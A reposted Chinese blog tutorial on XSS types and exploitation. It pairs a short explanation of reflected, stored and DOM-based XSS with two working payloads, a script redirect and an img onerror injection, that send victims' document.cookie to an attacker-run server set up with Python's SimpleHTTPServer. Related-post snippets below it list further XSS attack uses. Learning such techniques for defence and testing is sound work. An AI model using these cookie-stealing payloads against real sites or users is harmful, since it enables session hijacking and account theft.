xss 利用方式

最新推荐文章于 2024-06-12 10:55:23 发布
最新推荐文章于 2024-06-12 10:55:23 发布
阅读量803 收藏 2
点赞数
文章标签: 数据库 python javascript ViewUI
原文链接:http://www.cnblogs.com/ktfsong/p/11271128.html
版权

漏洞原理

  HTML是一种超文本标记语言,通过将一些字符特殊地对待来区别文本和标记,例如,小于符号(<)被看作是HTML标签的开始,<title>与</title>之间的字符是页面的标题等等。当动态页面中插入的内容含有这些特殊字符(如<)时,用户浏览器会将其误认为是插入了HTML标签,当这些HTML标签引入了一段JavaScript脚本时,这些脚本程序就将会在用户浏览器中执行。所以,当这些特殊字符不能被动态页面检查或检查出现失误时,就将会产生XSS漏洞,见于服务端将用户输入不加过滤直接返回到客户端,产生反射型xss攻击,存储型xss,例如留言板,将用户输入存储进数据库,当有用户查看留言,触发存储型xss。

  xss 分为 反射型xss,存储型xss,DOM型xss

  反射型xss,不经过数据库存储,非持久性xss,服务端直接返回到客户端,利用方式,通过构造恶意链接,当用户点击链接,就触发了xss。

  存储型xss,一般出现在网站留言、评论、博客日志等交互处,恶意脚本存储到客户端或者服务端的数据库中,持久性xss。

  DOM型xss,DOM :文档对象模型,客户端脚本处理逻辑导致的安全问题。

 

XSS利用方式:

 1. 需要一个xss平台来收集cookie

 2. 对于反射型xss可构造链接,当用户点击时,用户cookie被发送到xss平台

 3. 窃取用户cooike之后加以利用

 可以基于xss平台进行利用

 

以下以自己搭建平台利用为例:将cookie拼接到url后作为参数,请求搭建的简单平台测试

利用python2 自带SimpleHTTPServer,监听端口,查看get请求,得到cookie

运行HTTP 服务

py -2 -m SimpleHTTPServer 8080

 

 

 

script 标签:

<script>window.location.href='http://服务器地址/?cookie='+document.cookie</script> 

请求html

 

查看服务端响应,得到cookie

 

 

 img标签:

<img src=x onerror = document.body.appendChild(document.createElement('img')).setAttribute('src','http://服务器地址/?='+document.cookie); >

 请求html

查看服务端响应,得到cookie

 

 延申: X-XSS-Protection  :    xss保护,当服务端请求头带有X-XSS-Protection: 1 时,浏览器开启xss 保护机制。 

 

转载于:https://www.cnblogs.com/ktfsong/p/11271128.html

asai8159
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
XSS漏洞原理和利用
VictorZhang
08-09 1万+
XSS漏洞原理和利用 1.XSS介绍及原理 XSS又叫CSS(Cross Site Script),跨站脚本攻击。它指的是恶意攻击者往Web页面 里插入恶意JS代码,当用户浏览该页之时,嵌入其中Web里面的JS代码会被执行,从而 达到恶意的特殊目的。 利用我们所知道的各种黑魔法,向Web页面插入JS代码,让JS代码可以被浏览器执行, 访问该页面的用户则被攻击。 XSS漏洞分类 1.反射型 非存储型...
XSS漏洞的利用
LizePing_的博客
07-29 4758
XSS利用利用XSS窃取cookieXSS修改网页XSS获取用户信息XSS+CSRF 组合拳盲打XSS(Blind XSS)利用开启HttpOnly下的利用1.phpinfo页2.框架钓鱼3.跳转钓鱼4.历史密码5.获取源码6.通过xss伪造oauth等授权请求,远程登录其它 利用XSS窃取cookie 窃取cookie是xss利用常见的手段,攻击者有了cookie就相当于拥有了“管理员”身份。 通常需要配合xss平台来进行攻击,当被攻击者访问到有恶意代码的页面,他的cookie就会被发送到xss平台。
【网络安全】XSS漏洞- XSS基础概述及利用
最新发布
goldfish8848的博客
06-12 1197
跨站脚本(Cross-site Scripting)攻击,攻击者通过网站注入点注入客户端可执行解析的payload(脚本代码),当用户访问网页时,恶意payload自动加载并执行,以达到攻击者目的(窃取cookie、恶意传播、钓鱼欺骗等)为了避免与HTML中的CSS相混淆,通常称它为XSS
xss原理及利用
MAPLE102424的博客
05-12 1387
跨站脚本(cross site script)为了避免与样式css混淆,所以简称为XSSXSS是指恶意攻击者利用网站没有对用户提交数据进行转义处理或者过滤不足的缺点,进而添加一些代码,嵌入到web页面中去。当别的用户访问都会执行相应的嵌入代码。 从而盗取用户资料、利用用户身份进行某种动作或者对访问者进行病毒侵害的一种攻击方式
XSS漏洞利用的构造方法,变形方式,Shellcode的调用
weixin_47306547的博客
09-28 1698
XSS的四种构造方法 1.利用 <> 构造HTML/JS 可以利用 <> 构造 HTML 标签和 <script> 标签 在测试页面提交参数 <h1 style='color:red'>利用 <> 构造 HTML/JS </h1> 提交 <script> alert(/xss/) </script> 2.伪协议 可以使用 jacasc...
XSS能做些什么
积累,在于坚持
01-19 4960
1、Cookie劫持 利用浏览器插件,可以获取请求中的Cookie信息,从获取到的Cookie信息中,读取用户的私密信息。 2、模拟GET、POST请求操作用户的浏览器。使用JavaScript模拟浏览器发包 “Cookie劫持”失效时,或者目标用户的网络不能访问互联网等情况下,这种方式非常有用 3、XSS钓鱼 利用JavaScript在当前页面“画出”一
xss利用于挖掘
08-17
##### 方式三:利用图像标签发起XSS攻击 - **图像标签**:可以通过设置图像的`src`属性为包含恶意脚本的URL来发起XSS攻击。 - 示例:`var x = new Image(); x.src = "URL?数据";` ##### 其他XSS攻击手段 - **调用...
XSS利用文档
05-23
跨站脚本(Cross-Site Scripting,简称XSS)是一种常见的网络安全漏洞,它允许攻击者在用户浏览器中注入恶意脚本。这种攻击通常发生在Web应用...通过深入研究和学习XSS利用文档,我们可以更好地理解和应对这一威胁。
XSS利用与挖掘-_更新版.rar_Exploit_XSS_XSS 利用_pkav_web exploit
09-23
本文将详细讲解XSS利用方法以及挖掘技巧,基于"XSS利用与挖掘-_更新版.pptx"这份资料,我们将深入探讨这一主题。** 首先,我们需要理解XSS的三种主要类型:反射型XSS、存储型XSS和DOM型XSS。 1. **反射型XSS**:...
记录几种XSS绕过方式1
08-03
XSS(Cross-site scripting)是一种常见的网络安全漏洞,它允许攻击者在用户浏览器上注入恶意脚本,从而控制用户的会话、窃取敏感信息等。本文主要记录了几种XSS绕过的方法,帮助开发者理解攻击者可能使用的技巧,...
xsstry:xss漏洞利用平台
06-10
**XSS漏洞利用平台——深入理解XSS与CSS在安全中的角色** XSS(Cross Site Scripting)漏洞是一种常见的网络安全问题,它允许攻击者在受害者的浏览器上执行恶意脚本。"xsstry"是一个用于XSS漏洞测试和利用的平台,...
xss漏洞分析与利用
qq_34304107的博客
04-13 3346
一、寻找XSS1、找到可控参数URL参数输入表单HTTP头部信息(user-agent、ip、location、referrer等)2、找到参数输出点HTML标签JavaScript事件DOM型3、精心构造payload二、利用BurpSuite实现自动化测试XSSValidator+phantomjs+xss.js1、burpsuite安装xss-validator插件2、安装phantomjs...
XSS漏洞的危害及利用方式
weixin_41705627的博客
02-06 1493
定义:XSS漏洞就是攻击者往web页面插入恶意的js代码,当用户浏览该页时,嵌入其中的js代码会被执行,从而达到恶意攻击用户的目的。 特点:XSS攻击主要是拿用户的权限,因此攻击前提是用户能正常登陆。 1 防御与绕过 1.1 函数 htmlspecialchars():是PHP的内置函数,可以将预定义的<>符号转化为html实体; 使用效果:无论在输入框中输入什么内容,都会被添加上""使其以字符串的形式存在和展示,让恶意代码无法生效。 绕过 如果被过滤的地方是表单,可以尝试表单的其他地.
XSS的高级利用部分总结 -蠕虫
weixin_34224941的博客
11-20 1019
XSS的高级利用部分总结 -蠕虫,HTTP-only,AJAX本地文件操作,镜象网页本帖最后由 racle 于 2009-5-30 09:19 编辑 XSS的高级利用总结 -蠕虫,HTTPONLY,AJAX本地文件操作,镜象网页By racle@tian6.com http://bbs.tian6.com/thread-12711-1-1.html转帖请保留版权---------------...
xss攻击进阶篇---如何利用抓包工具Fiddler进行xss攻击
前端小工
11-12 1万+
最近对自己的项目进行了xss攻击,想找到还存在什么漏洞;玩着玩着玩上瘾了,顺手帮别人的网站做了测试,结果时,不费一兵一卒就轻易拿下;还可以进行CSRF攻击,攻击别人的帐号.xss的危害可小可大;比如弄一些恶作剧,弹出一些东西,大到恶意地操作别的帐号,做一下钓鱼的入口等等 什么是xss,什么csrf;在这里我们不去讨论;相关的知识点请看之前我写过的一篇文章XSS跨站脚本攻击与CSRF跨站请求伪造攻击的
整理常见的三种XSS攻击类型
热门推荐
Edon-Du的博客
06-07 2万+
什么是XSS? 简单的说就是没有做好校验,因为前端的用户输入的数据别人可以拦截,然后嵌入一些脚本代码或者其它的而达到不良的结果,有点类似与sql注入的攻击。 百科的一段介绍: XSS又叫CSS (Cross Site Script) ,跨站脚本攻击。它指的是恶意攻击者往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入其中Web里面的html代码会被执行,从而达到...
关于xss的三种类型详解
土拨鼠挖洞中的博客
04-12 1万+
一、简介什么是XSS?百度百科的解释: XSS又叫CSS  (Cross Site Script) ,跨站脚本攻击。它指的是恶意攻击者往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入其中Web里面的html代码会被执行,从而达到恶意用户的特殊目的。它与SQL注入攻击类似,SQL注入攻击中以SQL语句作为用户输入,从而达到查询/修改/删除数据的目的,而在xss攻击中,通过插入恶意脚本,实...
XSS的三种类型和对应的预防措施
darabiuz的博客
04-03 2270
1. 什么是XSS cross-site-scriping,跨站脚本攻击,为了和css区分,取名为xss 通常是在网页里嵌入一段恶意的js代码:让浏览器在渲染dom的时候,意外地执行了恶意的js代码,使得黑客盗取个人信息(通常盗取了新浪微博的账号和密码,还可以试试能不能去登录支付宝qq),执行恶意的操作(比如发恶意帖,删帖,微博关注人,转发未必之类的操作) 2. XSS的分类 1.Dom类型 DOM 型 XSS 的攻击步骤: • 攻击者构造出特殊的 URL,其中包含恶意代码。 • 用户打开带有恶意代
XSS漏洞利用深度解析
"xss利用与挖掘" XSS(Cross-site scripting)是一种常见的网络安全漏洞,它允许攻击者在用户的浏览器上注入恶意脚本。通过XSS攻击,攻击者能够窃取用户的敏感信息,如cookies,或者控制用户的浏览器行为,例如...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值